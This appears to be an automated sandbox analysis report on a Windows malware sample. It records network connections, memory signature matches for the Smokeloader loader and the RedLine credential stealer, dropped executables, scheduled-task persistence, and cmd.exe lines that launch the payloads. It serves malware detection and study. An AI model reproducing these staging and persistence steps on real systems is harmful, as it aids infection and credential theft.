Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 54094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58925
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 58885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 58931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 59028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 58926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown Network traffic detected: HTTP traffic on port 58938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54094
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59029
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59030
Source: unknown Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58879
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58877
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58882
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58884
Source: unknown Network traffic detected: HTTP traffic on port 58877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58880
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 59027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59065
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58931
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 50309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown Network traffic detected: HTTP traffic on port 59031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50300

System Summary

Source: 00000025.00000002.3001198301.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000025.00000002.3000226741.00000000025A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2400576225.00000000024ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.2835940724.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.2836488033.000000000267E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2401105762.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CB9B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CB9B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CB9B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CB3F280
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File created: C:\Windows\Tasks\explorti.job
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB6CBE8 appears 133 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB794D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2456
Source: file.exe, 00000000.00000000.2131986346.0000000002448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2450900392.000000006CDB5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2447928645.000000006CBC2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000025.00000002.3001198301.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000025.00000002.3000226741.00000000025A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2400576225.00000000024ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.2835940724.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.2836488033.000000000267E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2401105762.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.18.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 7ca32398cd.exe.18.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: random[1].exe.0.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: enter[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: enter[1].exe.0.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: axplong.exe.6.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: axplong.exe.6.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: explorti.exe.9.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: explorti.exe.9.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@146/292@104/40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CB97030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7XZ4F84C.htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8012
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1336
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2036
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: 7ca32398cd.exe, 00000014.00000002.2836006553.000000000266E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT url FROM urls LIMIT 1000Mn;S
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9'
Source: file.exe, file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2208818096.0000000022B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222496195.0000000022B1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe Virustotal: Detection: 46%
Source: RoamingBKJEGDGIJE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingIJEGDBGDBF.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
